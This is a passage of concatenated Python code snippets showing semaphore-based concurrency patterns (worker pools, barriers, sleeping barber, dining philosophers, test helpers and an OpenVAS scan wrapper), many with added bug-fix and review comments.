class JobManager(LogMaster):
    """Runs queued jobs on short-lived worker threads.

    Keeps at most ``maxthreads`` workers alive at once by gating thread
    creation with a counting semaphore.  It is not a real thread pool:
    a fresh thread is fired for every job.
    """

    def __init__(self, maxthreads, loglevel=logging.INFO):
        self.setLogger(self.__class__.__name__, loglevel)
        self.maxthreads = maxthreads
        # One permit per allowed concurrent worker thread.
        self.semaph = Semaphore(value=self.maxthreads)
        self.jobq = Queue()
        # NOTE(review): nothing in this class ever sets `running` to False;
        # shutdown presumably relies on daemon threads dying with the
        # process — confirm against callers.
        self.running = True
        self.dispatcher = Thread(target=self._jobdispatcher, daemon=True)
        self.dispatcher.start()

    def putjob(self, job):
        """Enqueue a job object exposing an ``execute()`` method."""
        self.jobq.put(job)

    def harness(self, job):
        """Worker entry point: run the job, then free a worker slot.

        BUG FIX: the release is now in a ``finally`` so a raising job
        cannot leak the semaphore permit and permanently shrink the
        worker pool.
        """
        try:
            job.execute()
        finally:
            self.semaph.release()

    def _jobdispatcher(self):
        """Dispatcher loop: pull jobs and fire a worker thread for each."""
        self.logger.debug("Started job dispatcher thread")
        while self.running:
            self.semaph.acquire()  # wait for a free worker slot
            job = self.jobq.get()
            if job is None:
                # No-op/sentinel entry: give the slot back and keep looping.
                self.semaph.release()
                continue
            t = Thread(target=self.harness, args=(job,), daemon=True)
            t.start()
        self.logger.debug("Stopped job dispatcher thread")
class BarberShop:
    """Sleeping-barber synchronisation primitives.

    ``ncustomersWaiting`` counts seated customers waiting for a cut,
    ``semaChairs`` counts vacant waiting chairs, and ``nbarbers``
    signals that a barber is ready to serve.
    """

    def __init__(self, num_chairs):
        self.ncustomersWaiting = Semaphore(0)
        # Number of vacant chairs in the barber shop.
        self.semaChairs = Semaphore(num_chairs)
        self.nbarbers = Semaphore(0)

    def barber_ready_to_cut(self):
        """Block until a customer is waiting, then signal readiness."""
        self.ncustomersWaiting.acquire()
        self.nbarbers.release()

    def customer_enter(self):
        """Try to enter the shop.

        Returns True when a chair was free (the customer entered) and
        False when the customer was turned away at the door.
        """
        # Non-blocking acquire already yields the required boolean.
        return self.semaChairs.acquire(False)

    def customer_take_a_seat(self):
        """Sit down, wake the barber, and wait to be served."""
        # Release before acquiring so we cannot deadlock with the barber.
        self.ncustomersWaiting.release()
        self.nbarbers.acquire()
        self.semaChairs.release()
class PromptService(object):
    """Bridges synchronous input requests to an asynchronous command window."""

    def __init__(self):
        self.semaphore = Semaphore(0)  # signalled when a response arrives
        self.commandWindow = None
        self.response = None

    def setCommandWindow(self, window):
        """Register the window used to prompt the user."""
        self.commandWindow = window

    def requestInput(self, prompt):
        """Prompt the user and block until `respond` delivers a value.

        Raises RuntimeError when no window has registered itself, and
        KeyboardInterrupt when the delivered response is None
        (interpreted as cancellation).
        """
        if self.commandWindow is None:
            raise RuntimeError("Command window hasn't registered itself")
        self.commandWindow.prompt(prompt if prompt is not None else '',
                                  'standard-output', self.respond,
                                  'standard-input')
        self.semaphore.acquire()
        if self.response is None:
            raise KeyboardInterrupt
        res = self.response
        self.response = None
        return str(res)

    def respond(self, value):
        """Callback invoked by the window; wakes the waiting requester."""
        self.response = value
        self.semaphore.release()
class TestPubSubscribe(unittest.TestCase):
    """End-to-end publish/subscribe round-trip test against a live client."""

    def onMessage(self, message):
        """Subscription callback: validate the payload and count deliveries."""
        self.assertTrue(len(message.payload_objects) > 0)
        body = message.payload_objects[0].content
        self.assertIn(body, MESSAGES)
        self.counter += 1
        # Wake the main thread once every expected message has arrived.
        if self.counter == len(MESSAGES):
            self.semaphore.release()

    def setUp(self):
        self.counter = 0
        self.semaphore = Semaphore(0)
        self.bw_client = Client()
        self.bw_client.setEntityFromFile(KEY_FILE)
        self.bw_client.overrideAutoChainTo(True)
        self.bw_client.subscribe(URI, self.onMessage)

    def tearDown(self):
        self.bw_client.close()

    def testPublishSubscribe(self):
        """Publish every message, then block until all were received."""
        for text in MESSAGES:
            payload = PayloadObject((64, 0, 0, 0), None, text)
            self.bw_client.publish(URI, payload_objects=(payload,))
        self.semaphore.acquire()
def recover_images(parser, destination):
    """Parse images and save them to <manga>/<chapter>/<image>.

    Downloads run on ImageSaver threads, at most
    BaseParser.MAX_CONNECTIONS at once (each saver releases the
    semaphore slot when it finishes).
    """
    urls = parser.parse()
    manga_path = os.path.join(destination, parser.title)
    ch_digits = len(str(len(urls)))
    for chapter, pages in urls:
        # Normalize chapter digits (zero-pad to a fixed width).
        chapter = str(chapter).zfill(ch_digits)
        chapter_path = os.path.join(manga_path, chapter)
        if not os.path.exists(chapter_path):
            os.makedirs(chapter_path)
        savers = []
        logging.info('Saving Chapter %s to %s', chapter, chapter_path)
        pg_digits = len(str(len(pages)))
        sem = Semaphore(BaseParser.MAX_CONNECTIONS)
        for page, url in enumerate(pages, start=1):
            sem.acquire()  # wait for a free download slot
            # Normalize page digits.
            page = str(page).zfill(pg_digits)
            path = os.path.join(chapter_path, page + '.jpg')
            saver = utils.ImageSaver(path, url, sem)
            savers.append(saver)
            saver.start()
        # BUG FIX: `map(lambda t: t.join(), savers)` is lazy on Python 3,
        # so the joins never actually ran; iterate explicitly instead.
        for saver in savers:
            saver.join()
class Barrier:
    """Reusable two-phase barrier for `n` threads (two-turnstile design)."""

    def __init__(self, n):
        self.n = n
        self.count = 0
        self.mutex = Semaphore(value=1)       # guards `count`
        self.turnstile1 = Semaphore(value=0)  # entry gate
        self.turnstile2 = Semaphore(value=0)  # exit gate

    def phase1(self):
        """Gather all n threads; the last arrival opens the entry gate."""
        with self.mutex:
            self.count += 1
            if self.count == self.n:
                logging.debug("Releasing the entry barrier.")
                for _ in range(self.n):
                    self.turnstile1.release()
        self.turnstile1.acquire()

    def phase2(self):
        """Drain all n threads; the last one out opens the exit gate.

        BUG FIX: the trigger used to be `count == 1`, which deadlocks
        for n == 1 (the sole thread decrements straight to 0 and nobody
        releases) and for n > 1 releases before the last thread has
        decremented, letting fast threads lap the barrier.  The
        canonical condition is `count == 0`.
        """
        with self.mutex:
            self.count -= 1
            if self.count == 0:
                logging.debug("Unlocking the exit barrier.")
                for _ in range(self.n):
                    self.turnstile2.release()
        self.turnstile2.acquire()

    def wait(self):
        """Block until all n threads have reached the barrier."""
        logging.debug("At the barrier.")
        self.phase1()
        logging.debug("Past the barrier.")
        self.phase2()
def test_max_concurrent_requests(mini_sentry, relay):
    """Relay with max_concurrent_requests=1 must serialize upstream stores."""
    from time import sleep
    from threading import Semaphore

    processing_store = False
    # BUG FIX: Semaphore() defaults to an initial value of 1, so the
    # first acquire below succeeded even if no event was ever stored.
    # Start at 0 so each acquire needs a matching store.
    store_count = Semaphore(0)

    mini_sentry.project_configs[42] = mini_sentry.basic_project_config()

    @mini_sentry.app.endpoint("store_event")
    def store_event():
        # Two overlapping calls would mean relay exceeded the limit.
        nonlocal processing_store
        assert not processing_store
        processing_store = True
        # sleep long, but less than event_buffer_expiry
        sleep(0.5)
        store_count.release()
        sleep(0.5)
        processing_store = False
        return "ok"

    relay = relay(
        mini_sentry,
        {"limits": {"max_concurrent_requests": 1},
         "cache": {"event_buffer_expiry": 2}},
    )
    relay.wait_relay_healthcheck()

    relay.send_event(42)
    relay.send_event(42)

    # BUG FIX: Semaphore.acquire returns False on timeout instead of
    # raising, so the unchecked result silently hid missing stores.
    assert store_count.acquire(timeout=4)
    assert store_count.acquire(timeout=4)
class IterableThread(Thread):
    """File-like adapter that feeds written data to a storage object.

    `write` appends to an internal buffer (starting the worker thread on
    first use); the worker calls `storage_object.send(self)`, which reads
    the buffer back through `read`.
    """

    def __init__(self, storage_object):
        Thread.__init__(self)
        self.data = ''
        self.storage_object = storage_object
        self.notstarted = True  # NOTE(review): never read anywhere visible
        self.semaphore = Semaphore()  # signals "new data or closed"
        self.closed = False

    def read(self, size):
        """Return up to `size` chars, blocking until enough data or close."""
        while len(self.data) < size and not self.closed:
            self.semaphore.acquire(True)
        ret = self.data[:size]
        self.data = self.data[size:]
        return ret

    def write(self, data):
        """Append data; lazily start the worker and wake any reader."""
        self.data += data
        # BUG FIX: Thread.isAlive() was removed in Python 3.9; use the
        # is_alive() spelling (available since Python 2.6).
        if not self.is_alive():
            self.start()
        self.semaphore.release()

    def run(self):
        # Hand ourselves to the storage object as its readable source.
        self.storage_object.send(self)

    def close(self):
        """Mark the stream closed and unblock a waiting reader."""
        self.closed = True
        self.semaphore.release()
class BinarySemaphore:
    """Thin wrapper giving a Semaphore the classic wait/signal naming."""

    def __init__(self, initial):
        # Backing counting semaphore, seeded with `initial` permits.
        self.sem = Semaphore(initial)

    def wait(self):
        """P operation: take a permit, blocking while none is available."""
        self.sem.acquire()

    def signal(self):
        """V operation: return a permit, waking one blocked waiter."""
        self.sem.release()
def _setup_to_do_n_cycles(self, number_of_cycles: int, updates_each_cycle: UpdateCollection=None):
    """
    Sets up the test so that the retriever will only do n cycles.

    Each mocked mapper call releases `semaphore` (so this thread can
    count the cycle) and then blocks on `lock_until_counted` until the
    count has been taken, giving this method the chance to stop the
    manager exactly at cycle n.
    :param number_of_cycles: the number of cycles to do
    :param updates_each_cycle: updates returned by every mocked mapper
        call (defaults to an empty UpdateCollection)
    """
    if updates_each_cycle is None:
        updates_each_cycle = UpdateCollection([])
    semaphore = Semaphore(0)        # signalled once per retrieval cycle
    lock_until_counted = Lock()
    lock_until_counted.acquire()    # held so mapper calls block until counted

    def increase_counter(*args) -> UpdateCollection:
        # Runs on the retrieval manager's thread for every cycle.
        semaphore.release()
        lock_until_counted.acquire()
        return updates_each_cycle

    self.retrieval_manager.update_mapper.get_all_since.side_effect = increase_counter
    self.retrieval_manager.start()
    run_counter = 0
    while run_counter < number_of_cycles:
        semaphore.acquire()
        run_counter += 1
        lock_until_counted.release()
        # Stop before the mapper can begin an (n+1)-th cycle.
        if run_counter == number_of_cycles:
            self.retrieval_manager.stop()
    self.retrieval_manager.update_mapper.get_all_since.side_effect = None
def test_get_all_when_file_moved(self):
    """Moving a file (delete + create) must leave get_all() unchanged."""
    self.source.start()
    block_until_synchronised_files_data_source_started(self.source)

    move_semaphore = Semaphore(0)
    deleted = False

    def on_change(change: FileSystemChange):
        # A move surfaces as DELETE followed by CREATE; release once for
        # each half so the test can wait for both events.
        nonlocal deleted
        if change == FileSystemChange.DELETE:
            move_semaphore.release()
            deleted = True
        if deleted and change == FileSystemChange.CREATE:
            move_semaphore.release()

    self.source.add_listener(on_change)

    original_path = glob.glob("%s/*" % self.temp_directory)[0]
    shutil.move(original_path, "%s_moved" % original_path)

    for _ in range(2):
        move_semaphore.acquire()
    self.assertCountEqual(self.source.get_all(), self.data)
class ObjKeeper(object):
    """Bounded keeper for one kind of resource object.

    A semaphore caps how many objects can be checked out at once; the
    deque holds the currently pooled instances.
    """

    def __init__(self, max_size):
        self.lock = Semaphore(max_size)  # free checkout slots
        self.objs = deque()

    def pop(self):
        """Take a slot and return a pooled object, or None when empty.

        A None return tells the caller to build a fresh object; the
        slot stays held either way and is given back by `push`.
        """
        self.lock.acquire()
        try:
            return self.objs.popleft()
        except IndexError:
            # BUG FIX: was a bare `except:` that swallowed everything
            # (including KeyboardInterrupt); only an empty deque should
            # mean "create a new object".
            return None

    def push(self, obj):
        """Return an object (or a falsy placeholder) and free the slot."""
        if obj:
            self.objs.append(obj)
        # Always release, even when obj is None/falsy.
        self.lock.release()
def pmap(f, l, limit=None):
    """A parallel version of map that preserves ordering.

    Runs `f` over `l` with one thread per element, optionally capping
    concurrency at `limit` in-flight threads via a semaphore (released
    by `mapper` when an element finishes).

    Example:
    >>> pmap(lambda x: x*x, [1, 2, 3])
    [1, 4, 9]
    """
    pool_semaphore = Semaphore(limit) if limit else None
    pool = []
    # BUG FIX: `res = range(len(l))` is an immutable range object on
    # Python 3, so mapper could not store results into it; use a
    # pre-sized mutable list instead.
    res = [None] * len(l)
    for i in range(len(l)):
        t = Thread(target=mapper, args=(f, l[i], res, i, pool_semaphore))
        pool.append(t)
        if limit:
            pool_semaphore.acquire()  # wait for a free slot
        t.start()
    # BUG FIX: `map(lambda x: x.join(), pool)` is lazy on Python 3 and
    # never joined the threads; iterate explicitly.
    for t in pool:
        t.join()
    return res
def my_scan(myip,myemail):
    """Run a 'Full and fast' OpenVAS scan of `myip` and write the report.

    Skips the scan when a result HTML for this IP already exists under
    the user's results directory (derived from the email local part).
    Blocks until the scan's end callback fires.
    """
    global manager
    # Results live under /root/myopenvas/results/<email local part>/
    Mydir="/root/myopenvas/results/"+myemail[0:myemail.find('@')]
    if os.path.isfile(Mydir+"/"+myip+".html"):
        print myip+" already exist"
        return
    start=datetime.datetime.now()
    print "Start of: "+myip+" at : ",start
    # """
    # Semaphore used as a one-shot "scan finished" latch: the end
    # callback releases it and the acquire below blocks until then.
    Sem =Semaphore(0)
    scan_id,target_id=manager.launch_scan(
        target=myip,
        profile="Full and fast",
        callback_end=partial(lambda x:x.release(),Sem),
        callback_progress=my_print_status
    )
    Sem.acquire()
    # """
    end=datetime.datetime.now()
    print "End of: "+myip+" at : ",end
    print "*******************************"
    print "Cost :",(end-start)
    print "*******************************"
    report_id=manager.get_tasks_last_report_id(scan_id)
    write_report(report_id,myip,myemail)
class OneLaneBridge(object):
    """
    A one-lane bridge allows multiple cars to pass in either direction,
    but at any point in time, all cars on the bridge must be going in
    the same direction.

    Cars wishing to cross should call the cross function, once they
    have crossed they should call finished()

    NOTE(review): the counters (`num_cars_on`, `waiting`) are mutated
    without any mutex, so concurrent cross()/finished() calls can race —
    confirm whether callers serialize access or accept the race.
    """

    def __init__(self):
        self.direction = random.randrange(2)  # current travel direction (0 or 1)
        self.cars_on = Semaphore(0)           # permits handed to cars waiting for the bridge to empty
        self.num_cars_on = 0                  # cars currently on the bridge
        self.waiting = 0                      # cars blocked waiting to cross

    def cross(self,direction):
        """wait for permission to cross the bridge.
        direction should be either north (0) or south (1)."""
        # Block only when the bridge is occupied by opposing traffic.
        if (direction != self.direction) and self.num_cars_on:
            print "Waiting going direction %d" % direction
            self.waiting += 1
            self.cars_on.acquire()
        # Bridge is empty or == direction so we can take the opening and cross
        self.direction = direction
        self.num_cars_on += 1

    def finished(self, direction):
        """Leave the bridge; the last car off wakes every waiting car."""
        self.num_cars_on -= 1
        if not self.num_cars_on:
            # Release one permit per waiting car, then reset the count.
            for car in range(self.waiting):
                self.cars_on.release()
            self.waiting = 0
class Race:
    """Reusable start/finish stage barriers for NUM_TEAMMATES threads.

    NOTE(review): NUM_TEAMMATES is a module-level constant defined
    elsewhere — confirm it matches the number of participating threads.
    """

    def __init__(self):
        self.stageFinishCount = 0
        self.stageStartCount = 0
        self.mutex = Semaphore(1)  # used for mutual exclusion while writing
        self.stageFinishSema = Semaphore(0)
        # This is used so that people dont try to finish the next stage
        # until everyone has left the prev stage
        self.stageStartSema = Semaphore(0)

    def teammate_start_stage(self):
        """Block until every teammate has reached the stage start."""
        count = 0
        with self.mutex:
            self.stageStartCount = self.stageStartCount + 1
            count = self.stageStartCount
        # The semaphore wait happens outside the mutex; waiting while
        # holding it would deadlock the counter updates.
        if count < NUM_TEAMMATES:
            self.stageStartSema.acquire()
        else:
            self.stageStartCount = 0
            # only last person starting the stage would release all thread.
            for i in range(NUM_TEAMMATES-1):
                self.stageStartSema.release()

    def teammate_finish_stage(self):
        """Block until every teammate has finished the stage."""
        count = 0  # local variable separate to each thread
        with self.mutex:
            self.stageFinishCount = self.stageFinishCount + 1
            count = self.stageFinishCount
        if count < NUM_TEAMMATES:
            self.stageFinishSema.acquire()
        else:
            self.stageFinishCount = 0
            # last teammate only can do this
            for i in range(NUM_TEAMMATES-1):
                self.stageFinishSema.release()
def wait_for_call(obj, target, callback=None):
    """Patch `obj.target` and wait for it to be called.

    Yields a WaitResult; on exit of the patched region, blocks until a
    call was observed (or, when `callback` is given, until it approves
    one).  The wrapped attribute still returns/raises exactly like the
    original.
    """
    sem = Semaphore(0)
    result = WaitResult()
    original = getattr(obj, target)

    def maybe_release(args, kwargs, res, exc_info):
        # The optional callback may veto releasing for this call.
        approved = callback(args, kwargs, res, exc_info) if callable(callback) else True
        if approved:
            result.send(res, exc_info)
            sem.release()

    def wraps(*args, **kwargs):
        res, exc_info = None, None
        try:
            res = original(*args, **kwargs)
        except Exception:
            exc_info = sys.exc_info()
        maybe_release(args, kwargs, res, exc_info)
        if exc_info is not None:
            six.reraise(*exc_info)
        return res

    with patch.object(obj, target, new=wraps):
        yield result
        sem.acquire()
class Synchronized:
    """Mixin that wraps the methods listed in `__synchronized__` with
    CallHook so only one thread at a time may run them.

    NOTE(review): CallHook, VERBOSE and currentThread come from
    elsewhere in this module — the hook presumably brackets the wrapped
    method with acquireInstance/releaseInstance; confirm against
    CallHook's implementation.
    """

    def __init__(self):
        from threading import Semaphore
        self.__lock = Semaphore()      # instance-wide mutual exclusion
        self.__ownerThread = None      # thread currently holding the lock
        classdict = self.__class__.__dict__
        # Replace each declared method with a synchronizing wrapper
        # bound on the instance (shadows the class attribute).
        for attr in classdict.get("__synchronized__", ()):
            try:
                method = classdict[attr]
                if callable(method):
                    self.__dict__[attr] = CallHook(self, method)
                else:
                    if VERBOSE:
                        print "! Synchronized: Object is not callable: %s" % (attr,)
            except KeyError:
                if VERBOSE:
                    print "! Synchronized: Method not found: %s" % (attr,)

    def releaseInstance(self):
        """Drop ownership and release the instance lock."""
        self.__ownerThread = None
        self.__lock.release()

    def acquireInstance(self):
        """Take the instance lock and record the owning thread."""
        self.__lock.acquire()
        self.__ownerThread = currentThread()

    def ownerThread(self):
        """Return the thread currently holding the lock (or None)."""
        return self.__ownerThread
def test_basic_action(self):
    """BASIC_ACTION schedules: argument validation and one-shot execution.

    Py3 compat fixes: assertEquals (removed in Python 3.12) is now
    assertEqual, and the Python-2-only `ctx.exception.message` is now
    `str(ctx.exception)`.
    """
    start = time.time()
    semaphore = Semaphore(0)
    controller = self._get_controller()
    controller.set_unittest_semaphore(semaphore)
    self.assertEqual(len(controller.schedules), 0)
    with self.assertRaises(RuntimeError) as ctx:
        # Doesn't support duration
        controller.add_schedule('basic_action', start + 120, 'BASIC_ACTION', None, None, 1000, None)
    self.assertEqual(str(ctx.exception), 'A schedule of type BASIC_ACTION does not have a duration. It is a one-time trigger')
    invalid_arguments_error = 'The arguments of a BASIC_ACTION schedule must be of type dict with arguments `action_type` and `action_number`'
    with self.assertRaises(RuntimeError) as ctx:
        # Incorrect argument
        controller.add_schedule('basic_action', start + 120, 'BASIC_ACTION', 'foo', None, None, None)
    self.assertEqual(str(ctx.exception), invalid_arguments_error)
    with self.assertRaises(RuntimeError) as ctx:
        # Incorrect argument
        controller.add_schedule('basic_action', start + 120, 'BASIC_ACTION', {'action_type': 1}, None, None, None)
    self.assertEqual(str(ctx.exception), invalid_arguments_error)
    controller.add_schedule('basic_action', start + 120, 'BASIC_ACTION', {'action_type': 1, 'action_number': 2}, None, None, None)
    self.assertEqual(len(controller.schedules), 1)
    self.assertEqual(controller.schedules[0].name, 'basic_action')
    self.assertEqual(controller.schedules[0].status, 'ACTIVE')
    controller.start()
    semaphore.acquire()  # wait until the scheduler executed the action
    self.assertEqual(GatewayApi.RETURN_DATA['do_basic_action'], (1, 2))
    self.assertEqual(len(controller.schedules), 1)
    self.assertEqual(controller.schedules[0].name, 'basic_action')
    self.assertEqual(controller.schedules[0].status, 'COMPLETED')
    controller.stop()
def test_group_action(self):
    """GROUP_ACTION schedules: argument validation and one-shot execution.

    Py3 compat fixes: assertEquals (removed in Python 3.12) is now
    assertEqual, and the Python-2-only `ctx.exception.message` is now
    `str(ctx.exception)`.
    """
    start = time.time()
    semaphore = Semaphore(0)
    controller = self._get_controller()
    controller.set_unittest_semaphore(semaphore)
    # New controller is empty
    self.assertEqual(len(controller.schedules), 0)
    with self.assertRaises(RuntimeError) as ctx:
        # Doesn't support duration
        controller.add_schedule('group_action', start + 120, 'GROUP_ACTION', None, None, 1000, None)
    self.assertEqual(str(ctx.exception), 'A schedule of type GROUP_ACTION does not have a duration. It is a one-time trigger')
    with self.assertRaises(RuntimeError) as ctx:
        # Incorrect argument
        controller.add_schedule('group_action', start + 120, 'GROUP_ACTION', 'foo', None, None, None)
    self.assertEqual(str(ctx.exception), 'The arguments of a GROUP_ACTION schedule must be an integer, representing the Group Action to be executed')
    controller.add_schedule('group_action', start + 120, 'GROUP_ACTION', 1, None, None, None)
    self.assertEqual(len(controller.schedules), 1)
    self.assertEqual(controller.schedules[0].name, 'group_action')
    self.assertEqual(controller.schedules[0].status, 'ACTIVE')
    controller.start()
    semaphore.acquire()  # wait until the scheduler executed the action
    self.assertEqual(GatewayApi.RETURN_DATA['do_group_action'], 1)
    self.assertEqual(len(controller.schedules), 1)
    self.assertEqual(controller.schedules[0].name, 'group_action')
    self.assertEqual(controller.schedules[0].status, 'COMPLETED')
    controller.stop()
class ThreadMaster:
    """Launches worker threads while capping how many run concurrently."""

    def __init__(self, maxThreads):
        self.maxThreads = maxThreads
        # Counting semaphore: one permit per available worker slot.
        self.freeThreads = Semaphore(value=self.maxThreads)

    def waitUntilAllReady(self):
        """Block until every started worker has called done()."""
        # Drain every permit (only possible once all workers finished),
        # then immediately restore them for further use.
        for _ in range(self.maxThreads):
            self.freeThreads.acquire()
        for _ in range(self.maxThreads):
            self.freeThreads.release()

    def startFunction(self, fun, ar):
        """Start `fun(*ar)` on a new thread once a slot is free."""
        worker = Thread(target=fun, args=ar)
        self.freeThreads.acquire()
        worker.start()

    def done(self):
        """Hand a worker slot back (called when a worker finishes)."""
        self.freeThreads.release()
class JobWatcher(Thread):
    """
    Mechanism to watch Job activity, it will cleanup run instances and
    re-generate run if it is a multi_run job.
    """

    def __init__(self, workspace):
        super().__init__()
        self.workspace = workspace
        # Used as a wake-up latch rather than a plain mutex: other code
        # presumably release()s it to make the watcher run a pass —
        # confirm against the callers.
        self.watcher_lock = Semaphore()

    def run(self):
        """ Loop for looking on finished run """
        logging.debug("Start JobWatcher")
        while True:
            # Drain any spare permit without blocking, then block in the
            # `with` below until someone releases the semaphore (the
            # context manager re-releases its permit on exit).
            self.watcher_lock.acquire(blocking=False)
            with self.watcher_lock:
                logging.debug("Watcher is watching")
                stopping = bool(self.workspace.metadata["status"] & STOPPED)
                # Collect jobs whose run thread has terminated.
                to_removes = [x.job for x in self.workspace.runs.values()
                              if not x.is_alive()]
                for job in to_removes:
                    del self.workspace.runs[job.name]
                    # Re-schedule repeating jobs unless shutting down.
                    if job.multi_run and not stopping:
                        thread, trigger = job.schedule(self.workspace)
                        self.workspace.runs[job.name] = thread
                        if trigger is not None:
                            self.workspace.triggers.append(trigger)
                        thread.start()
                # Prune dead triggers.
                # NOTE(review): removing from the list being iterated can
                # skip elements; consider iterating a copy.
                for trigger in self.workspace.triggers:
                    if not trigger.is_alive():
                        self.workspace.triggers.remove(trigger)
        # NOTE(review): unreachable — the `while True` above never exits.
        logging.debug("End JobWatcher")
class AsyncWorker(object):
    """Background checker: re-sends a view's code to the plugin server
    and collects errors whenever do_more_work() signals new content."""

    def __init__(self, view):
        self.view = view
        self.plugin = get_plugin(view)
        self.content = view.substr(sublime.Region(0, view.size()))
        self.filename = view.file_name()
        self.view_id = view.buffer_id()
        self.errors = None
        # Semaphore starts at 1; the immediate acquire lowers it to 0 so
        # the work() loop blocks until do_more_work releases it.
        self.sem = Semaphore()
        self.sem.acquire()
        self.has_round_queued = False

    def do_more_work(self):
        """Snapshot the current view text and wake the worker
        (at most one pending round at a time)."""
        self.content = self.view.substr(sublime.Region(0, self.view.size()))
        if not self.has_round_queued:
            self.sem.release()
            self.has_round_queued = True

    def final(self):
        """Runs on the UI thread: publish errors and allow a new round."""
        self.plugin.handle_errors(self.view, self.errors)
        self.plugin.set_error_status(self.view)
        self.has_round_queued = False

    def work(self):
        """Worker loop body; never returns."""
        while True:
            # Wait on semaphore
            self.sem.acquire()
            # Update the script
            self.plugin.update_server_code(self.filename, self.content)
            # Get errors
            self.errors = self.plugin.serv_get_errors(self.filename)
            # Publish results back on the UI thread.
            sublime.set_timeout(self.final, 1)
            self.content = self.plugin.views_text[self.filename]
            sleep(1.3)  # throttle how often rounds can run
def _solve_mt(self, formula):
    """Portfolio solve: run every solver on `formula` in parallel and
    return the first solution produced.

    Each _PortfolioThread releases `sem` when its solver finishes, so
    the single acquire below wakes as soon as any one solver is done.
    """
    solverThreads = []
    solution = None
    sem = Semaphore(0)
    for solver in self.solvers:
        sThread = _PortfolioThread(solver, formula, sem)
        solverThreads.append(sThread)
        sThread.start()
    # Wait for at least one thread to finish
    sem.acquire()
    for sThread in solverThreads:
        if solution is None and sThread.solution is not None:
            # First finished solver wins; keep its benchmark data.
            solution = sThread.solution
            if not self.benchMode:
                self._benchmark = sThread.solver.getBenchmark()
        if not self.benchMode:
            # Abort the remaining solvers — NOTE(review): this also hits
            # the winning solver; confirm abort() is a no-op on a
            # finished solver.
            sThread.solver.abort()
    for sThread in solverThreads:
        sThread.join()
    assert solution is not None, "Solver returned with invalid solution"
    if self.benchMode:
        # In benchmark mode collect every solver's numbers instead.
        self._benchmark = [sThread.solver.getBenchmark() for sThread in solverThreads]
    return solution
class Footman:
    """Dining philosophers with a footman that admits at most n-1 diners."""

    def __init__(self, num_philosophers, num_meals):
        self.num_philosophers = num_philosophers
        self.num_meals = num_meals
        # One binary semaphore per fork.
        self.forks = [Semaphore(1) for _ in range(num_philosophers)]
        # Admitting at most n-1 philosophers to the table at once makes
        # circular-wait deadlock impossible.
        self.footman = Semaphore(num_philosophers - 1)

    def left(self, i):
        """Index of the fork to philosopher i's left."""
        return i

    def right(self, i):
        """Index of the fork to philosopher i's right (wraps around)."""
        return (i + 1) % self.num_philosophers

    def get_forks(self, i):
        """Ask the footman for a seat, then pick up both forks."""
        self.footman.acquire()
        self.forks[self.right(i)].acquire()
        self.forks[self.left(i)].acquire()

    def put_forks(self, i):
        """Put both forks down and leave the table."""
        self.forks[self.right(i)].release()
        self.forks[self.left(i)].release()
        self.footman.release()

    def philosopher(self, id):
        """Philosopher loop: eat and think until the meals run out."""
        while self.num_meals > 0:
            self.get_forks(id)
            # eating
            self.num_meals -= 1
            sleep(rng.random() / 100)
            self.put_forks(id)
            # thinking
            sleep(rng.random() / 100)
class _Result(object): ''' Class for a result composed of partials. Partials are stored in a dict: ``` { start_index: chunk, ... } ``` To get the result, a call to `get` method must be done. The call to `get` is blocking until the result is `completed`. Everytime a partial is added using the method `add_partial`, the count of chunks is incremented and compared with the expected number of chunks (given on `__init__`). If the count is equal, then a semaphore is released. The same semaphore is acquired on `get` call. That's why `get` call is blocking. ''' def __init__(self, no_chunks): super(_Result, self).__init__() self._n = no_chunks self._res = {} self._lock = Lock() self._no_collected = 0 self._completed_sem = Semaphore(0) @property def completed(self): self._lock.acquire() comp = self._no_collected == self._n self._lock.release() return comp # no setter provided @property def partial(self): return self._res def add_partial(self, key, partial): # thread-safe self._lock.acquire() self._res[key] = partial self._no_collected += 1 self._lock.release() if self.completed: self._completed_sem.release() def get(self): self._completed_sem.acquire() # release the semaphore for further # invokations of get() self._completed_sem.release() return self._res
class ReusableBarrierSem():
    """Reusable barrier built from two semaphore-gated phases."""

    def __init__(self, num_threads):
        self.num_threads = num_threads
        self.count_threads1 = num_threads  # arrivals still due in phase 1
        self.count_threads2 = num_threads  # arrivals still due in phase 2
        self.counter_lock = Lock()         # guards both counters
        self.threads_sem1 = Semaphore(0)   # gate for phase 1
        self.threads_sem2 = Semaphore(0)   # gate for phase 2

    def wait(self):
        """Block until all num_threads threads have called wait()."""
        self.phase1()
        self.phase2()

    def phase1(self):
        # Last thread to arrive opens the gate and re-arms phase 2.
        with self.counter_lock:
            self.count_threads1 -= 1
            if self.count_threads1 == 0:
                for _ in range(self.num_threads):
                    self.threads_sem1.release()
                self.count_threads2 = self.num_threads
        self.threads_sem1.acquire()

    def phase2(self):
        # Mirror image of phase1, re-arming phase 1 for reuse.
        with self.counter_lock:
            self.count_threads2 -= 1
            if self.count_threads2 == 0:
                for _ in range(self.num_threads):
                    self.threads_sem2.release()
                self.count_threads1 = self.num_threads
        self.threads_sem2.acquire()
class StatisticQueue:
    """Aggregates results produced by several stat-collector threads."""

    def __init__(self, stats):
        # Semaphore(1) used as a mutex guarding `result`.
        self._semaphore = Semaphore()
        self.result = {}
        self.stats = stats

    def write_result(self, data):
        """Thread-safely merge `data` into the shared result dict.

        BUG FIX: the semaphore is now held via a context manager, so an
        exception from dict.update can no longer leave it acquired
        forever (deadlocking every later writer).
        """
        with self._semaphore:
            self.result.update(data)

    def start_parse(self):
        """Run every collector on its own thread and return the merged result."""
        self.stats.connect()
        self.stats.init_message_stack()
        func_to_start = [
            self.stats.get_top3_speakers,
            self.stats.get_most_frequent_youtube_video,
            self.stats.get_time_activity,
            self.stats.get_abusive_expressions,
        ]
        threads = []
        for func in func_to_start:
            # Each collector receives this queue and reports via write_result.
            thread = Thread(target=func, args=(self, ))
            threads.append(thread)
            thread.start()
        for t in threads:
            t.join()
        return self.result
class BoundedHashSet(object):
    """Thread-safe set with a fixed maximum capacity.

    A mutex guards the underlying set; a counting semaphore enforces
    capacity: add() takes a permit (blocking at capacity) and erase()
    gives one back.
    """

    def __init__(self, capacity):
        self.mutex = Lock()             # guards self.st
        self.st = set()
        self.sem = Semaphore(capacity)  # free capacity slots

    def add(self, item):
        """Insert `item`, blocking while the set is at capacity.

        Duplicate adds return without blocking.  NOTE: as in the
        original, the membership pre-check happens before taking a
        permit, so two threads racing to add the same NEW item can both
        consume a permit; callers needing exact capacity must serialize
        adds of identical items.
        """
        with self.mutex:
            if item in self.st:
                return
        self.sem.acquire()  # may block until erase() frees a slot
        # BUG FIX: mutex handled with `with` so it can never be leaked.
        with self.mutex:
            self.st.add(item)

    def erase(self, item):
        """Remove `item` and free a capacity slot.

